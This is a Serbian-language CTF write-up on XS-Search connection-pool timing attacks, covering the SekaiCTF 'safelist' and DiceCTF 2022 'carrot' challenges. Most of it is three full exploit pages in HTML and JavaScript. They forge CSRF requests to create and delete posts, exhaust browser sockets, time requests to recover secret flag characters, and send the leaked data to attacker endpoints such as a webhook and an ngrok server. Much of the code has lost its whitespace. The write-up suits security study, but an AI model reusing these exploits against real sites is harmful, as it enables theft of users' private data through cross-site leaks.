U ovom izazovu, cilj je exfiltrirati zastavicu koja će se pojaviti u web sesiji bota unutar posta. Ovo su resursi koje napadač ima:
bot će posetitiURL koji je dao napadač
Napadač može ubaciti HTML na stranicu (ali ne i JS, koristi se dompurify) zloupotrebljavajući CSRF kako bi bot kreirao post sa tim HTML-om.
Napadač može zloupotrebiti CSRF da natera bota da obrišeprvipost unutar web-a.
Pošto su postovi poređani abecedno, kada se prvi post obriše, ako je HTML sadržaj napadača učitan, to znači da je bio abecedno pre zastavice.
Dakle, da bi ukrao zastavicu, rešenje koje predlaže @Strellic_ je da, za svaki karakter koji se testira bot:
Kreira novi post koji počinje sa poznatim delom zastavice i nekoliko imgučitavanja.
Obrišepost na poziciji 0.
Blokira 255 soketa.
Učitava stranicu sa postovima.
Izvrši 5 nasumičnih zahteva ka sajtu (example.com u ovom slučaju) i meri vreme koje to zahteva.
Ako je obrisani post bila zastavica, to znači da će se svi slikeubacene u HTML boriti sa 5 nasumičnih zahteva za taj neblokirani soket. Što znači da će izmereno vreme biti veće nego u drugom scenariju.
Ako je obrisani post bio HTML, 5 nasumičnih zahteva će biti brži jer se ne moraju boriti za taj soket sa ubačenim HTML-om.
<!-- Form to inject HTML code in the bots page --><formmethod="POST"action="https://safelist.ctf.sekai.team/create"id="create"target="_blank"><inputtype="text"name="text" /><inputtype="submit" /></form><!-- Form to delete the first entry --><formmethod="POST"action="https://safelist.ctf.sekai.team/remove"id="remove"target="_blank"><inputtype="text"name="index"value="0" /><inputtype="submit" /></form><script>// Attacker listeningconstWEBHOOK="https://WEBHOOK.com/";// Send data to attackerconstlog= (id, data) => {let payload =JSON.stringify({ known, alphabet, data });console.log(id, payload);navigator.sendBeacon(WEBHOOK+"?"+ id, payload);}// Similar to JQueryconst$=document.querySelector.bind(document);// Known part of the flagconstknown="SEKAI{";let alphabet ="_abcdefghijklmnopqrstuvwxyz}";// Reduce the alphabet using a hash (#) in the URLif (location.hash) {alphabet =alphabet.slice(alphabet.indexOf(location.hash.slice(1)));}// Funtion to leak charsconstleak=async (c) => {// Prepare post with known flag and the new charlet payload =`${known + c}`;// Inject as many <img as possible// you need to respect the CSP and create URLs that are differentfor(let i =0; payload.length<2048; i++) {payload +=`<img src=js/purify.js?${i.toString(36)}>`;}// Inject HTML$("#create input[type=text]").value = payload;$("#create").submit();awaitnewPromise(r =>setTimeout(r,1000));// Remove post with index 0$("#remove").submit();awaitnewPromise(r =>setTimeout(r,500));let deltas = [];// Try each char 3 timesfor (let i =0; i <3; i++) {constSOCKET_LIMIT=255;// you will need a custom server that works like num.sleepserver.com/sleep/delay// needed to freeze the blocked sockets, and they have to all be on different origins// Check https://www.npmjs.com/package/sleep-server using subdomains DNS wildcardconstSLEEP_SERVER= i =>`http://${i}.sleepserver.com/sleep/60`;constblock=async (i, controller) => {try {returnfetch(SLEEP_SERVER(i), { mode:"no-cors", signal:controller.signal });}catch(err) {}};// block SOCKET_LIMIT socketsconstcontroller=newAbortController();for (let i =0; i <SOCKET_LIMIT; i++) {block(i, controller);}// Make the bot access the page with the postswindow.open("https://safelist.ctf.sekai.team/?"+Math.random().toString(36).slice(2),"pwn");awaitnewPromise(r =>setTimeout(r,500));// start meassuring time to perform 5 requestslet start =performance.now();awaitPromise.all([fetch("https://example.com", { mode:"no-cors" }),fetch("https://example.com", { mode:"no-cors" }),fetch("https://example.com", { mode:"no-cors" }),fetch("https://example.com", { mode:"no-cors" }),fetch("https://example.com", { mode:"no-cors" })]);let delta =performance.now() - start;document.title = delta;controller.abort();log("test_"+ c +"_"+ i, delta);// Save time neededdeltas.push(delta);}return deltas;};// Check each charconstpwn=async () => {// Try to leak each characterfor(let i =0; i <alphabet.length; i++) {//Check the indicated charlet deltas =awaitleak(alphabet[i]);// Calculate mean time from requests to example.comlet avg =deltas.reduce((a,v) => a+v,0) /deltas.length;// If greater than 250, the HTML code was injected (flag in index 0)if (avg >250) {log("tests_pos_"+ alphabet[i], deltas)}// Flag in the pageelse {log("tests_neg_"+ alphabet[i], deltas)}}};window.onload=async () => {pwn();};</script>
<!DOCTYPEhtml><html><!--The basic idea is to create a post with a lot of images which send request to "/" to block server-side nodejs main thread.If images are loading, the request to "/" is slower, otherwise faster.By using a well-crafted height, we can let note with "A" load image but note with "Z" not load.We can use fetch to measure the request time.--><body><buttononclick="run()">start</button><formid=faction="http://localhost:1234/create"method="POST"target="_blank"><inputid=inpname="text"value=""></form><formid=f2action="http://localhost:1234/remove"method="POST"target="_blank"><inputid=inp2name="index"value=""></form><script>let flag ='SEKAI{'constTARGET='https://safelist.ctf.sekai.team'f.action =TARGET+'/create'f2.action =TARGET+'/remove'constsleep= ms =>newPromise(r =>setTimeout(r, ms))constsend= data =>fetch('http://server.ngrok.io?d='+data)constcharset='abcdefghijklmnopqrstuvwxyz'.split('')// start exploitlet count =0setTimeout(async () => {letL=0letR=charset.length-1while( (R-L)>3 ) {letM=Math.floor((L+R) /2)let c = charset[M]send('try_'+ flag + c)constfound=awaittestChar(flag + c)if (found) {L=M} else {R=M-1}}// fallback to linear since I am not familiar with binary search lolfor(let i=R; i>=L; i--) {let c = charset[i]send('try_'+ flag + c)constfound=awaittestChar(flag + c)if (found) {send('found: '+ flag+c)flag += cbreak}}},0)asyncfunctiontestChar(str) {returnnewPromise(resolve => {/*For 3350, you need to test it on your local to get this number.The basic idea is, if your post starts with "Z", the image should not be loaded because it's under lazy loading thresholdIf starts with "A", the image should be loaded because it's in the threshold.*/inp.value = str +'<br><canvas height="3350px"></canvas><br>'+Array.from({length:20}).map((_,i)=>`<img loading=lazy src=/?${i}>`).join('')f.submit()setTimeout(() => {run(str, resolve)},500)})}asyncfunctionrun(str, resolve) {// if the request is not enough, we can send more by opening more windowfor(let i=1; i<=5;i++) {window.open(TARGET)}let t =0constround=30setTimeout(async () => {for(let i=0; i<round; i++) {let s =performance.now()awaitfetch(TARGET+'/?test', {mode:'no-cors'}).catch(err=>1)let end =performance.now()t += end - sconsole.log(end - s)}constavg= t/roundsend(str +","+ t +","+"avg:"+ avg)/*I get this threshold(1000ms) by trying multiple times on remote admin botfor example, A takes 1500ms, Z takes 700ms, so I choose 1000 ms as a threshold*/constisFound= (t >=1000)if (isFound) {inp2.value ="0"} else {inp2.value ="1"}// remember to delete the post to not break our leak oraclef2.submit()setTimeout(() => {resolve(isFound)},200)},200)}</script></body></html>
DiceCTF 2022 - carrot
U ovom slučaju, prvi korak eksploata je bio zloupotreba CSRF-a da se izmeni stranica na kojoj se nalazi zastava tako da ima mnogo više sadržaja (i stoga učitavanje traje više vremena), a zatim zloupotreba konekcione baze da se izmeri vreme potrebno za pristup stranici koja potencijalno može sadržati zastavu.
U eksploatu možete videti:
Zloupotreba CSRF
Zauzeti sve sokete osim 1
Kalibracija odgovora
Početi bruteforce pristupom potencijalnoj stranici sa zastavom
Potencijalna stranica će biti pristupljena i odmah će biti pristupljena i URL pod kontrolom napadača kako bi se proverilo koliko vremena oba zahteva traju.
<h1>DiceCTF 2022 web/carrot</h1><p>Step 1: CSRF the admin user, to set a super long title for the flag note (LAX + POST form only possible for 2 minutes after cookies is created)</p><buttononclick="csrf()">do csrf</button><p>Step 2: XS-Search with <ahref="https://xsleaks.dev/docs/attacks/timing-attacks/connection-pool/">connection-pool timing leak</a>, we have to use window.open (LAX cookie)</p><buttononclick="popunder()">open popup</button><buttononclick="exhaust_sockets()">open 255 connections</button><buttononclick="oracle('dice{abc')">test search "abc" (slow)</button><buttononclick="oracle('dice{xxx')">test search "xxx" (fast)</button><br><br><h2id=output></h2><br><formid=xaction=""method="POST"style="display:none;"><inputtype="text"name="title"placeholder="title"><br><br><inputtype="number"name="priority"placeholder="priority"value=9999><br><br><textareaname="content"placeholder="content"rows="5"cols="20"></textarea><br><br><inputtype="submit"value="submit"></form><script>// this is send is used as loggingLOG='Starting'// 255 in normal chrome, 99 in headlessSOCKETLIMIT=255;// defaultTIMELIMIT=800;INSTANCE=''MYSERVER=`example.com`constsleep= (ms) => {returnnewPromise(resolve => {setTimeout(resolve, ms);});}consttime_fetch=async() => {let test_server_url =`https://${MYSERVER}/?${LOG}`;let start =window.performance.now();try {awaitfetch(test_server_url, {mode:'no-cors'});} catch (e) {console.log(e);}let end =window.performance.now();return end - start;}constfetch_sleep_long= (i) => {// 40s sleepreturnfetch(`https://${i}.${MYSERVER}/40sleep`, {mode:'no-cors'});}constfetch_sleep_short= (i) => {// 0.25s sleepreturnfetch(`https://${i}.${MYSERVER}/ssleep`, {mode:'no-cors'});}constblock_socket=async (i) => {fetch_sleep_long(i);// needed?awaitsleep(0);}constexhaust_sockets=async() => {let i =0for (; i <SOCKETLIMIT; i++) {block_socket(i);}console.log(`Used ${i} connections`);}consttimeit=async (url, popup) => {returnnewPromise(async (r) => {popup.location = url;// needed?awaitsleep(50)let val =awaittime_fetch()r(val)});}// const alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-}!"#$%&\'()*+,-./:;<=>?@[\\]^`|~{'.split('');constalphabet='abcdefghijklmnopqrstuvwxyz}_'.split('');// const alphabet = 'abcdef}'.split('');constoracle=async (search) => {let url =`https://carrot-${INSTANCE}.mc.ax/tasks?search=${search}`let t =awaittimeit(url,WINBG)LOG=`${search}:${t}`console.log(`${search}:${t}`)return t >TIMELIMIT}constbrute=async (flag) => {for (constcharof alphabet) {if (awaitoracle(flag + char)) {return char;}}returnfalse;}constcalibrate=async () => {returnnewPromise(async (r) => {// slowlet url1 =`https://carrot-${INSTANCE}.mc.ax/tasks?search=dice{`let t1 =awaittimeit(url1,WINBG)console.log(`slow:${t1}`)// fastlet url2 =`https://carrot-${INSTANCE}.mc.ax/tasks?search=XXXXXXXXXX`let t2 =awaittimeit(url2,WINBG)console.log(`fast:${t2}`)returnr((t1 + t2) /2)});}constexploit=async(flag ='') => {console.log('Starting')// dont go to fast plz :)console.log(`waiting 3s`)awaitsleep(3000)// exaust socketsawaitexhaust_sockets()awaitsleep(2000)LOG=`Calibrating`TIMELIMIT=awaitcalibrate()LOG=`TIMELIMIT:${TIMELIMIT}`console.log(`timelimit:${TIMELIMIT}`)awaitsleep(2000)let last;while (true) {last =awaitbrute(flag);if (last ===false) {return flag;}else {flag += last;output.innerText = flag;if(last ==='}'){return flag}}}}constpopunder= () => {if (window.opener) {WINBG=window.opener}else {WINBG=window.open(location.href, target="_blank")location =`about:blank`}}constcsrf=async () => {x.action =`https://carrot-${INSTANCE}.mc.ax/edit/0`x.title.value ="A".repeat(1000000)x.submit()}window.onload= () => {let p =newURL(location).searchParams;if(!p.has('i')){console.log(`no INSTANCE`)return}INSTANCE=p.get('i')// step 1if(p.has('csrf')){csrf()return}// step 2if (p.has('exploit')) {// window open is ok in headless :)popunder()exploit('dice{')}}</script>